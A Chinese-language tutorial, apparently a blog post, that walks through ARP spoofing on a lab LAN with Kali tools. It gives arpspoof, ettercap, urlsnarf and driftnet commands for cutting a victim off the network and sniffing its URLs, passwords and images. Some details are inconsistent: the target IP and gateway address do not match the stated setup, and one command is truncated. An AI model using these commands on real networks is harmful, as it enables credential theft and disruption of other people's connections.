严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。
本文目的
演示如何借助Kali Linux系统内置的 nmap、arpspoof、driftnet、ettercap、fping 等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗 和 流量监听,实现对目标主机/手机的 断网攻击、图片窃取、密码监听 等攻击目的。
| 工具 | 简介 |
| arpspoof | ARP欺骗的工具,可毒化受害者ARP缓存,将网关MAC替换为攻击者MAC |
| driftnet | 图片捕获工具,用于监听网络流量并从它观察到的TCP流中提取图像的程序 |
| ettercap | 网络抓包工具,嗅探局域网数据流量、账号监听 |
| urlsnarf | 网址流量地址监听 |
环境:
cetos:192.168.100.132
kali攻击机:192.168.100.128
ifconfig
ping 先查看是否能ping通
route 查看网关
1、打开端口转发
echo 1 >/proc/sys/net/ipv4/ip_forward 1代表打开 0代表关闭
cat /proc/sys/net/ipv4/ip_forward 查看是否打开
2、开启arp欺骗
arpspoof -t 192.168.100.133 192.168.100.0 -i eth0
断网攻击
执行arpspoof攻击 不需要开启端口转发 或者关闭端口转发 即可 完成 局域网断网攻击
网站流量监听
urlsnarf -i eth0 //监听地址
centos 进入网站
监听到的数据包信息
监听账号密码
开启arp攻击后
使用ettercap监听
-Tq -i eth0 这个命令 进行监听 //针对http https 不可以
得到账号admin 密码admin
图片监听
driftnet -i eth0
其它
主机发现 fping 命令
nmap命令
